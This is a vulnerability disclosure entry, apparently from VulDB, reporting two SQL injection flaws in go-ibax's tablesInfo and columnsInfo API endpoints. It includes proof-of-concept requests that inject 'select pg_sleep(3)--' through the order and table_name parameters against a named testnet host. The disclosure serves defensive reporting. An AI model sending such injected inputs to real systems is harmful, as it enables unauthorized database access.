| Titel | SQL Injection vulnerabilities in go-ibax via order,table_name parameter |
|---|
| Beschreibung | There are two SQL injection vulnerabilities.
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo
data: page=1&limit=1&order=1; select pg_sleep(3)--
POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo
data: table_name=1; select pg_sleep(3)--
Reported by Tom(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01 |
|---|
| Quelle | ⚠️ https://github.com/IBAX-io/go-ibax/issues/2060 |
|---|
| Benutzer | Tomy (UID 34751) |
|---|
| Einreichung | 01.11.2022 12:36 (vor 4 Jahren) |
|---|
| Moderieren | 01.11.2022 16:38 (4 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 212634 [IBAX go-ibax /api/v2/open/tablesInfo SQL Injection] |
|---|
| Punkte | 20 |
|---|